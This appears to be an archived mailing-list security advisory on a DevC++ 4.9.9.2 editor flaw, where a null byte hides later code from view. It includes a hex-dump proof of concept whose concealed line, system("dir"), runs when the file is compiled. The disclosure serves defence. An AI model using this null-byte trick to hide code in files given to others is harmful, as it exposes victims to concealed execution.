<<< Date Index >>>     <<< Thread Index >>>

DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW (by rgod)



DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW

UPDATE TO HTTP://RGOD.ALTERVISTA.ORG/SYN.HTML
explaining Synedit component obfuscation flaw

exploit: a user can craft a malicious file using null byte (%00) to obfuscate
code and hide malicious instrunctions to the victim user

poc:

this is an hexadecimal dump of poc.cpp file

23 69 6e 63 6c 75 64 65 20 3c 69 6f 73 74 72 65    # i n c l u d e  < i o s t r 
e 
61 6d 2e 68 3e 0d 0a 23 69 6e 63 6c 75 64 65 20    a m . h >   # i n c l u d e  
3c 73 74 64 6c 69 62 2e 68 3e 0d 0a 0d 0a 69 6e    < s t d l i b . h >     i n 
74 20 6d 61 69 6e 28 29 0d 0a 7b 0d 0a 20 20 63    t  m a i n ( )   {     c 
6f 75 74 20 3c 3c 20 22 48 65 6c 6c 6f 20 57 6f    o u t  < <  " H e l l o  W o 
72 6c 64 21 22 3b 0d 0a 20 20 00 73 79 73 74 65    r l d ! " ;        s y s t e 
6d 20 28 22 64 69 72 22 29 3b 20 0d 0a 20 20 72    m  ( " d i r " ) ;      r 
65 74 75 72 6e 20 30 3b 0d 0a 7d 20 0d 0a 0d 0a    e t u r n  0 ;   }  

when you open with DevC++,It looks like this:

#include <iostream.h>
#include <stdlib.h>

int main()
{
  cout << "Hello World!";
  
  return 0;

}

but when a victim user compile and execute it

system('dir');

will be executed even

rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it

original advisoty: http://rgod.altervista.org/devcpp.html